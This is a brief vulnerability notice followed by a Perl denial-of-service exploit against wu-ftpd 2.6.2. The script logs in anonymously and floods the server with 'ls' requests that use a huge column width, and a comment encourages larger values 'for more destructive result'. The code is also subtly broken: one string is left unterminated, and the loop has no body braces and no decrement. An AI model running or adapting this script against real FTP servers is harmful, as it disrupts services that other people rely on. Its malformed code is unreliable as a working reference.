Vulnerable systems:
* wu-ftpd version 2.6.2
# DoS sploit for ls
# tested against wu-ftpd 2.6.2
# coded by (c) druid
# greets to viator
use Net::FTP;
(($target = $ARGV[0])&&($count = $ARGV[1])) || die "usage:$0 <target> <count>";
my $user = "anonymous";
my $pass = "halt\";
$cols=1000000;#you can increase this value for more destructive result ;)
print ":: Trying to connect to target system at: $target...\n"; $ftp = Net::FTP->new($target, Debug => 0, Port => 21) || die "could not
connect: $!";
print "Connected!\n";
$ftp->login($user, $pass) || die "could not login: $!";
print "Logged in!\n";
while ($count)
$ftp->ls("-w $cols -C");
print "Done!\n";